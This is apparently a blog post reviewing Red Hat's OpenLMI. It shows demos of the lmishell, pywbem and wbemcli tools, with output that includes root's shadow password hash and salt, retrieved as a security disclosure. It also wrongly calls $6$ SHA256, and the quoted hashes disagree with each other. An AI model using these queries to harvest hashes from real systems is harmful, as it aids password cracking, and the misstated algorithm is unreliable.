OpenLMI - Open Linux Management Interface

According to the OpenLMI project webpage:

OpenLMI provides a common infrastructure for the management of Linux systems. Capabilities include configuration, management and monitoring of hardware, operating systems, and system services. OpenLMI includes a set of services that can be accessed both locally and remotely, multiple language bindings, standard APIs, and standard scripting interfaces.

OpenLMI is another attempt by Red Hat to provide unified management of Linux systems. This is not their first attempt to provide such functionality. Their previous (failed) attempt, back in the 2010/2011 era, was called Matahari and was based on Apache Qpid QMF (AMQP Messaging – Qpid Management Framework). The Matahari agent framework (matahari-*) packages were deprecated in the Red Hat Enterprise Linux 6.3 release.

It is based on DMTF (Distributed Management Task Force) CIM (Common Information Model). Yes, I hear your groans! I also groaned when I first heard about OpenLMI and its use of CIM. I have many scars from using CIM in the late 1990s. In my humble opinion, some of the CIM schemas make no sense except to individual companies. For example, the DMTF networking schema was essentially written by Citrix and is probably only used by Citrix. BTW, DMTF used to be called the Desktop Management Task Force.

The primary focus of OpenLMI appears to be configuring and managing enterprise hardware, especially storage and networks. OpenLMI can be used on either physical servers or on virtual machine guests. By design, OpenLMI provides a common management interface to multiple versions of Red Hat Enterprise Linux (RHEL) and Fedora. It is intended to provide an abstraction layer to hide much of the complexity of the underlying system from systems administrators.

Architecturally, OpenLMI consists of system management agents installed on a managed system, a controller to manage these agents and provide an interface to them, and client applications or scripts which call the management agents through the controller. OpenLMI leverages standards-based infrastructure components already present in RHEL and Fedora, such as the Pegasus CIMOM, but provides new (OpenLMI) system agents. Note that the CIMOM (Common Information Model Object Manager) is itself also a CIM object. System agents are more commonly called providers in OpenLMI.

Providers currently available include:

  • Networking – providers for network management
  • Account Management – providers for management of users and groups
  • Proxy – a generator for providers that hand request processing over to the CIMOM
  • Storage Management – providers for management of storage and mounting. It uses Blivet, the former Anaconda storage library, to manage storage.
  • Software Management – providers for management of software

OpenLMI does not attempt to deliver a complete systems management solution. It simply provides the low-level functions, capabilities and interfaces (APIs) that can be called from scripts or system management consoles. Supported interfaces include C, C++, Python, Java, and an OpenLMI shell. These interfaces are implemented as language bindings to the underlying system agents.

Fedora 19 does not install OpenLMI by default. An OpenLMI controller and a set of OpenLMI agents must be installed on the system to be managed. Specifically, OpenLMI requires you to install WBEM (Web-Based Enterprise Management) support on your system. Either OpenPegasus or the Small Footprint CIM Broker (SFCB) package can be used. OpenPegasus is an open-source implementation of the DMTF CIM and WBEM standards. It is written in C++ and is a comprehensive implementation. SFCB is a CIM server for resource-constrained and embedded environments. It is written in C and designed to be modular and lightweight. For the purposes of this blog, I used the OpenPegasus package.

If you use the Pegasus package, a user called pegasus is created on your system. You have to set the password for pegasus using the passwd command and then restart the tog-pegasus service.

Another package that I installed was YAWN (Yet Another WBEM Navigator). YAWN is a web browser-based CIM client. It runs under Apache and requires mod_python. Currently YAWN works with SFCB, Pegasus, and OpenWBEM.

To show you how convoluted and unwieldy CIM namespaces can be, let us use YAWN to explore what CIM exposes. If you point your favourite web browser to http://localhost/yawn/, this is the initial webpage that you should see:

Type in localhost as the Host, and click the Login button. After entering the credentials for the pegasus user, you should see a list of namespaces.

Select root/cimv2 and all the CIM classes for root/cimv2 are displayed.

If you select the Linux_UnixProcess class you will see a webpage something like the following:

Click on the Instance names link to get a listing of all instances of Linux_UnixProcess. Essentially, this is a listing of all the processes on your system:

Here is what the output looks like if I get details of instance (process) number 9:

You can also programmatically obtain information from CIMOM about processes and more. Here is an example of how to use the lmishell to get information about processes.

$ cat demo.py
#!/usr/bin/lmishell

# lmishell supplies connect(); the script runs under the shell's embedded Python.
c = connect("localhost", "user", "password")

# Enumerate every instance of Linux_UnixProcess, i.e. every process on the host.
procs = c.root.cimv2.Linux_UnixProcess.instances()
for p in procs:
    # Columns: PID, parent PID, process name (right-aligned in 20 chars), creation timestamp.
    print("%6s %6s %20s %s" % (p.Handle, p.ParentProcessID, p.Name, p.CreationDate))

$ ./demo.py
     1      0              systemd 20130711002020.000000-300
     2      0             kthreadd 20130711002020.000000-300
     3      2          ksoftirqd/0 20130711002020.000000-300
     5      2         kworker/0:0H 20130711002020.000000-300
     7      2         kworker/u:0H 20130711002020.000000-300
     8      2          migration/0 20130711002020.000000-300
     9      2               rcu_bh 20130711002020.000000-300
    10      2            rcu_sched 20130711002020.000000-300
    11      2           watchdog/0 20130711002020.000000-300
    12      2           watchdog/1 20130711002020.000000-300
    13      2          migration/1 20130711002020.000000-300
    14      2          ksoftirqd/1 20130711002020.000000-300
    16      2         kworker/1:0H 20130711002020.000000-300
    17      2           watchdog/2 20130711002020.000000-300
    18      2          migration/2 20130711002020.000000-300
    19      2          ksoftirqd/2 20130711002020.000000-300
    21      2         kworker/2:0H 20130711002020.000000-300
    22      2           watchdog/3 20130711002020.000000-300
    23      2          migration/3 20130711002020.000000-300
    24      2          ksoftirqd/3 20130711002020.000000-300
    26      2         kworker/3:0H 20130711002020.000000-300
    27      2              khelper 20130711002020.000000-300
    28      2            kdevtmpfs 20130711002020.000000-300
    29      2                netns 20130711002020.000000-300
    30      2          bdi-default 20130711002020.000000-300
    31      2          kintegrityd 20130711002020.000000-300
    32      2              kblockd 20130711002020.000000-300
    33      2              ata_sff 20130711002020.000000-300
    34      2                khubd 20130711002020.000000-300
    35      2                   md 20130711002020.000000-300
    60      2              kswapd0 20130711002020.000000-300
    61      2                 ksmd 20130711002020.000000-300
    62      2           khugepaged 20130711002020.000000-300
    63      2        fsnotify_mark 20130711002020.000000-300
    64      2               crypto 20130711002020.000000-300
    72      2             kthrotld 20130711002020.000000-300
    75      2            scsi_eh_0 20130711002020.000000-300
    76      2            scsi_eh_1 20130711002020.000000-300
    77      2            scsi_eh_2 20130711002020.000000-300
    78      2            scsi_eh_3 20130711002020.000000-300
    79      2            scsi_eh_4 20130711002020.000000-300
    80      2            scsi_eh_5 20130711002020.000000-300
    86      2            kpsmoused 20130711002020.000000-300
    88      2              deferwq 20130711002020.000000-300
    96      2              kauditd 20130711002021.000000-300
   149      2         kworker/1:1H 20130711002021.000000-300
   151      2            scsi_eh_6 20130711002021.000000-300
   152      2            scsi_wq_6 20130711002021.000000-300
   153      2         kworker/0:1H 20130711002021.000000-300
   154      2         kworker/3:1H 20130711002021.000000-300
   157      2         kworker/2:1H 20130711002021.000000-300
   166      2          jbd2/sda3-8 20130711002027.000000-300
   167      2      ext4-dio-unwrit 20130711002027.000000-300
   207      1     systemd-journald 20130711002029.000000-300
   217      1              lvmetad 20130711002030.000000-300
   235      1        systemd-udevd 20130711002031.000000-300
   288      2            hd-audio0 20130711002032.000000-300
   309      2      kvm-irqfd-clean 20130711002032.000000-300
   335      2          jbd2/sda2-8 20130711002035.000000-300
   336      2      ext4-dio-unwrit 20130711002035.000000-300
   349      2          jbd2/sda5-8 20130711002037.000000-300
   350      2      ext4-dio-unwrit 20130711002037.000000-300
   353      2          jbd2/sdb1-8 20130711002038.000000-300
   354      2      ext4-dio-unwrit 20130711002038.000000-300
   359      1               auditd 20130711002038.000000-300
   365    359              audispd 20130711002038.000000-300
   367    365           sedispatch 20130711002038.000000-300
   375      1              alsactl 20130711002038.000000-300
   377      1               python 20130711002038.000000-300
   379      1           irqbalance 20130711002038.000000-300
   382      1               smartd 20130711002038.000000-300
   384      1             rsyslogd 20130711002038.000000-300
   388      1       systemd-logind 20130711002038.000000-300
   389      1                  gpm 20130711002038.000000-300
   390      1                cupsd 20130711002038.000000-300
   391      1          dbus-daemon 20130711002038.000000-300
   393      1              chronyd 20130711002038.000000-300
   394      1                  gdm 20130711002038.000000-300
   395      1                crond 20130711002038.000000-300
   396      1                  atd 20130711002038.000000-300
   401      1                acpid 20130711002038.000000-300
   403      1               mcelog 20130711002038.000000-300
   407    394     gdm-simple-slave 20130711002038.000000-300
   413      1               colord 20130711002045.000000-300
   415      1       NetworkManager 20130711002045.000000-300
   440    407                 Xorg 20130711002045.000000-300
   455      1        modem-manager 20130711002045.000000-300
   461      1             libvirtd 20130711002045.000000-300
   465      1              rpcbind 20130711002045.000000-300
   483      1                httpd 20130711002045.000000-300
   485      1                 sshd 20130711002045.000000-300
   488      1      accounts-daemon 20130711002045.000000-300
   544      1            sendmail: 20130711002045.000000-300
   586      1            sendmail: 20130711002045.000000-300
   731      1   console-kit-daemon 20130711002046.000000-300
   934      1              upowerd 20130711002047.000000-300
  1029      1         rtkit-daemon 20130711002047.000000-300
  1095    483                httpd 20130711002048.000000-300
  1096    483                httpd 20130711002048.000000-300
  1097    483                httpd 20130711002048.000000-300
  1098    483                httpd 20130711002048.000000-300
  1099    483                httpd 20130711002048.000000-300
  1123      1              dnsmasq 20130711002048.000000-300
  1269    407   gdm-session-worker 20130711002111.000000-300
  1277      1 gnome-keyring-daemon 20130711002115.000000-300
  1279   1269        gnome-session 20130711002115.000000-300
  1287      1          dbus-launch 20130711002115.000000-300
  1288      1          dbus-daemon 20130711002115.000000-300
  1352      1                gvfsd 20130711002115.000000-300
  1373      1           gvfsd-fuse 20130711002115.000000-300
  1447      1  at-spi-bus-launcher 20130711002116.000000-300
  1451   1447          dbus-daemon 20130711002116.000000-300
  1454      1    at-spi2-registryd 20130711002116.000000-300
  1463   1279 gnome-settings-daemon 20130711002116.000000-300
  1480      1           pulseaudio 20130711002116.000000-300
  1502      1 gvfs-udisks2-volume-monitor 20130711002117.000000-300
  1504      1              udisksd 20130711002117.000000-300
  1509   1480         gconf-helper 20130711002117.000000-300
  1512      1             gconfd-2 20130711002117.000000-300
  1515      1 gvfs-gphoto2-volume-monitor 20130711002117.000000-300
  1519      1 gvfs-afc-volume-monitor 20130711002117.000000-300
  1531      1          gsd-printer 20130711002118.000000-300
  1533      1        dconf-service 20130711002118.000000-300
  1545   1279          gnome-shell 20130711002118.000000-300
  1550      1          ibus-daemon 20130711002118.000000-300
  1558   1550           ibus-dconf 20130711002118.000000-300
  1561      1             ibus-x11 20130711002118.000000-300
  1569      1 gnome-shell-calendar-server 20130711002118.000000-300
  1577      1 evolution-source-registry 20130711002119.000000-300
  1583      1    mission-control-5 20130711002119.000000-300
  1588   1550   ibus-engine-simple 20130711002119.000000-300
  1590      1           goa-daemon 20130711002119.000000-300
  1624   1279            nm-applet 20130711002119.000000-300
  1627   1279               python 20130711002119.000000-300
  1632   1279     tracker-miner-fs 20130711002119.000000-300
  1633   1279     deja-dup-monitor 20130711002119.000000-300
  1635   1279        tracker-store 20130711002119.000000-300
  1636   1279 evolution-alarm-notify 20130711002120.000000-300
  1656   1279          abrt-applet 20130711002120.000000-300
  1674      1 evolution-calendar-factory 20130711002121.000000-300
  1694   1279    zeitgeist-datahub 20130711002121.000000-300
  1701      1     zeitgeist-daemon 20130711002121.000000-300
  1755      1        zeitgeist-fts 20130711002121.000000-300
  1808   1755                  cat 20130711002121.000000-300
  1831      1 evolution-addressbook-factory 20130711002122.000000-300
  1873      1           gvfsd-burn 20130711002124.000000-300
  3152      2        lpfc_worker_0 20130711034101.000000-300
  3155      2         kworker/u:28 20130711034101.000000-300
  3156      2         kworker/u:29 20130711034101.000000-300
  3764      1 gnome-terminal-server 20130711044843.000000-300
  3767   3764     gnome-pty-helper 20130711044843.000000-300
  3768   3764                 bash 20130711044843.000000-300
  6306    415             dhclient 20130711121940.000000-300
  6690      1       gvfsd-metadata 20130711131148.000000-300
  7069      1          gvfsd-trash 20130711140717.000000-300
  7423      2          kworker/3:2 20130711141548.000000-300
  7513      1              polkitd 20130711144803.000000-300
  8389      2          kworker/2:2 20130711170830.000000-300
  8404      2          kworker/1:0 20130711171356.000000-300
  8453      2          kworker/1:1 20130711172515.000000-300
  8567   1545              firefox 20130711174340.000000-300
  8642    483                httpd 20130711174402.000000-300
  8644    483                httpd 20130711174403.000000-300
  8808      2          kworker/3:0 20130711175401.000000-300
  8843      1            cimserver 20130711175750.000000-300
  9060      2          kworker/0:0 20130711180701.000000-300
  9205      2            flush-8:0 20130711183706.000000-300
  9237      2           flush-8:16 20130711190030.000000-300
  9260      2          kworker/2:0 20130711190100.000000-300
  9589    483                httpd 20130711191642.000000-300
  9590    483                httpd 20130711191643.000000-300
  9591    483                httpd 20130711191643.000000-300
  9906   3764                 bash 20130711193523.000000-300
  9994      2          kworker/0:1 20130711193700.000000-300
 10063   8567     plugin-container 20130711193829.000000-300
 10096   1545             nautilus 20130711193959.000000-300
 10155      1           cimprovagt 20130711194458.000000-300
 10194      1          packagekitd 20130711194803.000000-300
 10229   3768               python 20130711194912.000000-300
 10230  10155                   sh None
 10231  10230                   ps None


Security in OpenLMI is problematic. For example, I can, as a regular user, return the encoded password of another user if I know the CIMOM username and password.

$ cat demo1.py
#!/usr/bin/lmishell

c = connect("localhost", "username", "password")

# Fetch the LMI_Account instance whose Name is "root" and print its password field.
p = c.root.cimv2.LMI_Account.first_instance(key="Name", value="root")
print("{} {}".format(p.Name, p.UserPassword))

$ ./demo1.py
root [u'$6$OeHcJ066CyxGYah5$248KbUKRDZ/d8JAbouLsmkLTXZhAQeUMrY8YaMlF5kAQt754logoG9VwuWrLcaCPb0b3lcw0Qui2kBNRmGJNx0']


Note how easy it is to retrieve the encrypted password for root from /etc/shadow. We also get the password encoding scheme (6 = SHA256) and the salt!

$ cat demo2.py
#!/usr/bin/python

import pywbem

# CIMOM endpoint (CIM-XML over HTTPS) and the credentials of the pegasus user.
url = "https://localhost:5989"
username = "pegasus"
password = "password"

# pywbem defaults to the root/cimv2 namespace, which is where LMI_Account lives.
c = pywbem.WBEMConnection(url, (username, password))
slct = 'select Name, UserPassword from LMI_Account where Name = "root"'
p = c.ExecQuery('WQL', slct)
print(p[0].tomof())

$ ./demo2.py
instance of LMI_Account {
	UserPassword = {"$6$OeHdJ066CyxGYah5$248KbUPRDZ/d8JAbouLsmkLTXZqAQeUMrY8YxMlF2kAQt754lggoG9VsuWrLcaCPb0b4lcw0Qui2kKNRmAJNx0"};
	Name = "root";
};


As you can see from the above, this is not a problem specific to lmishell; it is a systemic problem. pywbem is a Python library for performing CIM operations over HTTP using the WBEM CIM-XML protocol. YAWN also uses pywbem. In pywbem, the default namespace is root/cimv2.
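To make the two preceding points concrete (what the returned UserPassword field reveals, and how pywbem hands it to a script), here is an added example written for this page; it is not code from OpenLMI, pywbem or the author. It is a small audit that classifies each account's password field in the glibc crypt(3) layout $id$[rounds=N$]salt$digest, maps the id to its algorithm, and reports whether a usable hash came back from the CIMOM without echoing the hash itself. Only fetch_accounts needs pywbem (Python 3 API, imported lazily); the names parse_crypt, audit_accounts and format_report, the SAMPLE_ACCOUNTS list and its hash values are all constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Any, Iterable, List, Optional

# Hash identifiers used by glibc crypt(3). The id between the first two '$'
# signs selects the algorithm; $6$ is the SHA-512 variant of sha-crypt.
CRYPT_IDS = {"1": "MD5-crypt", "5": "SHA-256-crypt", "6": "SHA-512-crypt"}


@dataclass
class HashInfo:
    algorithm: str          # human-readable algorithm name, or "none"
    salt: str               # salt exactly as stored, "" if absent
    rounds: Optional[int]   # explicit rounds=N value, None when the default applies
    digest_present: bool    # True when a verifiable digest is actually stored
    locked: bool            # True when the field carries a leading '!' (passwd -l)


def parse_crypt(field: str) -> HashInfo:
    """Classify one shadow-style password field without needing the plaintext."""
    field = field or ""
    locked = field.startswith("!")
    body = field.lstrip("!")
    # '*', 'x' or an empty body mean no password hash is stored at all.
    if body in ("", "*", "x") or not body.startswith("$"):
        return HashInfo("none", "", None, False, locked)
    parts = body.split("$")          # ['', id, (rounds=N,) salt, digest]
    hid = parts[1]
    if hid not in CRYPT_IDS:
        # bcrypt/yescrypt lay their fields out differently; report only the id.
        return HashInfo("unknown($" + hid + "$)", "", None, True, locked)
    rest = parts[2:]
    rounds = None
    if rest and rest[0].startswith("rounds="):
        rounds = int(rest[0][len("rounds="):])
        rest = rest[1:]
    salt = rest[0] if rest else ""
    digest = rest[1] if len(rest) > 1 else ""
    return HashInfo(CRYPT_IDS[hid], salt, rounds, digest != "", locked)


@dataclass
class AccountExposure:
    name: str
    hash_exposed: bool      # the CIMOM handed back a crackable digest
    algorithm: str
    salt_length: int
    locked: bool


def _first_string(value: Any) -> str:
    """LMI_Account.UserPassword is a string array; pywbem returns it as a list."""
    if isinstance(value, (list, tuple)):
        return value[0] if value else ""
    return value or ""


def audit_accounts(instances: Iterable[Any]) -> List[AccountExposure]:
    """Summarise what each LMI_Account instance reveals, without echoing the hash.

    Works on pywbem CIMInstance objects (subscriptable by property name) and on
    plain dicts, so it can be exercised offline with constructed data."""
    report = []
    for inst in instances:
        info = parse_crypt(_first_string(inst["UserPassword"]))
        report.append(AccountExposure(
            name=inst["Name"],
            hash_exposed=info.digest_present,
            algorithm=info.algorithm,
            salt_length=len(info.salt),
            locked=info.locked,
        ))
    return report


def format_report(report: Iterable[AccountExposure]) -> List[str]:
    """One redacted line per account: algorithm, salt length and lock state only."""
    lines = []
    for e in report:
        status = "HASH EXPOSED" if e.hash_exposed else "no hash"
        lines.append("%-10s %-13s %-14s salt=%d chars%s" % (
            e.name, status, e.algorithm, e.salt_length,
            " (locked)" if e.locked else ""))
    return lines


def fetch_accounts(url: str, username: str, password: str,
                   namespace: str = "root/cimv2"):
    """Live query against a CIMOM with pywbem (same WQL as the page's demo2.py)."""
    import pywbem  # imported lazily so the offline functions above need no pywbem
    conn = pywbem.WBEMConnection(url, (username, password), default_namespace=namespace)
    return conn.ExecQuery("WQL", "select Name, UserPassword from LMI_Account")


# Constructed sample instances standing in for what ExecQuery would return.
SAMPLE_ACCOUNTS = [
    {"Name": "root",  "UserPassword": ["$6$c0nstructedSalt$" + "A" * 86]},
    {"Name": "bin",   "UserPassword": ["*"]},
    {"Name": "svc",   "UserPassword": ["!$5$rounds=10000$s4lt$" + "B" * 43]},
    {"Name": "guest", "UserPassword": []},
]

if __name__ == "__main__":
    for line in format_report(audit_accounts(SAMPLE_ACCOUNTS)):
        print(line)
```

Run as a script it prints the redacted report for the constructed sample; to check a real broker, pass the result of fetch_accounts (pointed at your own CIMOM, with the certificate handling your deployment needs) to audit_accounts. The report deliberately carries only the algorithm, salt length and lock state, which is enough to record the finding that the CIMOM returns shadow hashes to ordinary CIMOM users without copying a hash into a ticket.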

If you install the sblim-wbemcli package, you can also access this data using wbemcli:

$ wbemcli -noverify gi -nl 'https://pegasus:password@localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com"'

localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com"
-InstanceID=
-Caption=
-Description=
-ElementName="root"
-Generation=
-InstallDate=
-OperationalStatus=
-StatusDescriptions=
-Status=
-HealthState=
-CommunicationStatus=
-DetailedStatus=
-OperatingStatus=
-PrimaryStatus=
-EnabledState=5
-OtherEnabledState=
-RequestedState=12
-EnabledDefault=2
-TimeOfLastStateChange=
-AvailableRequestedStates=
-TransitioningToState=12
-SystemCreationClassName="Linux_ComputerSystem"
-SystemName="ultra.xfpmurphy.com"
-CreationClassName="LMI_Account"
-Name="root"
-UserID="0"
-ObjectClass=
-Descriptions=
-Host="ultra.xfpmurphy.com"
-LocalityName=
-OrganizationName=""
-OU=
-SeeAlso=
-UserCertificate=
-UserPassword="$6$OeHcJ066CyxGYah5$268KbUKRDZ/d8JAGoismkLTXZqAQeUOrY8YxMlF5kAQt754lggoG9VsuWrLcaCPb0b3lcw0Qui2kKNRmGJNx0"
-PasswordHistoryDepth=
-PasswordExpiration=
-ComplexPasswordRulesEnforced=
-InactivityTimeout=
-MaximumSuccessiveLoginFailures=
-LastLogin=20130704161216.000000+000
-UserPasswordEncryptionAlgorithm=
-OtherUserPasswordEncryptionAlgorithm=
-UserPasswordEncoding=2
-HomeDirectory="/root"
-LoginShell="/bin/bash"
-PasswordLastChange=20120519000000.000000+000
-PasswordPossibleChange=00000000000000.000000:000
-PasswordExpirationWarning=
-PasswordInactivation=
-AccountExpiration=

OpenLMI is in the early stages of development. Not all functionality is available. The OpenLMI developers appear to welcome input from interested parties, which is a good thing. Will OpenLMI succeed? Possibly, if OpenLMI successfully integrates with established control panels like cPanel or Plesk. However, until the security holes in OpenLMI are plugged, no system administrator should deploy OpenLMI on any systems that need to be secure.
